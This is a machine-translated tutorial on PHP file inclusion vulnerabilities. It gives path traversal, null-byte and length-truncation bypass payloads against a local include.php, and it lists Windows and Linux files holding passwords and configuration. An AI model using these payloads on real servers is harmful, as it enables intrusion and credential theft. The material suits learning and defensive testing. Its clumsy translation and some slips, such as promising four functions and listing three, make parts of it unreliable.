The first part : File contains

1. The file contains basic concepts

Developers want more flexible code , Therefore, the included files are usually set as variables , Used to make dynamic calls . It is this flexibility , As a result, the client can call a malicious file , Create a file containing vulnerability . File includes local and remote .

Typical features
The value of the variable is a page ：
?page=a.php
?home=b.html
?file=content…

2. The file contains the prerequisites for exploit
（1）web Application and adoption include And other files contain functions , And the file path that needs to be included is transmitted through the user
Import by number ;
（2） The user can control the parameters of the included file , The included files can be accessed by the current page ;

Common functions that cause files to contain ：

PHP:include()、include_once()、require()、require_once() etc. ;
1.php The file contains code that can directly execute the included file , The included file format is not subject to any restrictions
stay php Four file containing functions are provided in ：
(1) Require: A fatal error occurs when the included file cannot be found (E_COMPILE_ERROR), And stop the script ;
(2) Include： When the included file cannot be found, only one will be generated (E_warinng), The script will continue to execute ;
(3) Require_once： And include Similar will generate warnings , The difference is if the file code has been included , Then there will be no more
Times included ;

3. The file contains access to webshell Conditions ：
（1） The attacker needs to know the physical path where the file is stored ;
（2） Have executable permissions on the directory where the uploaded file is located ;
（3） There is a file containing vulnerability ;

One . It contains

1. unlimited

Peer access ：http://127.0.0.1/include.php?filename=1.txt

Cross level access ：http://127.0.0.1/include.php?filename=../../../www.txt

2. Limited

Bypassing ideas ：

One 、%00 truncation （ Conditions ：magic_quotes_gpc = off  ,php edition <5.3.4>）

for example ：1.txt%00

principle ： Put the back of .html To truncate

Two 、 Length truncation ：（ Conditions ：windows, The dot needs to be longer than 256,linux Longer than 4096）

for example ：

1.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././.

/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

3、 ... and 、 Point around

1.txt................................................................................................................

principle ：（ Other symbols can also ） Just over 256 individual , Then limit the following html You can't join ,

And the system will automatically delete the following symbols .

The second part ： Remote contains

Bypass method

http://127.0.0.1/include.php?filename=1.txt%20

http://127.0.0.1/include.php?filename=1.txt%23

http://127.0.0.1/include.php?filename=1.txt？

wait ... ...

Common sensitive paths ：
1 Windows
C:\boot.ini // Check the system version
C:\windows\system32\inetsrv\MetaBase.xml //IIS The configuration file
C:\windows\repair\sam // Storage windows Password for initial installation of the system
C:\Program Files\mysql\my.ini //mysql To configure
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\windows\php.ini //php Configuration information
C:\windows\my.ini //mysql The configuration file

2 UNIX/Linux
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf //apache2 Default profile
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf // Virtual website settings
/usr/local/app/php5/lib/php.ini //PHP Related configuration
/etc/httpd/conf/httpd.conf //apache
/etc/php5/apache2/php.ini //ubuntu The default path of the system

Part of the article reprints , Link to the original text :https://blog.csdn.net/qq_39431542/article/details/88628225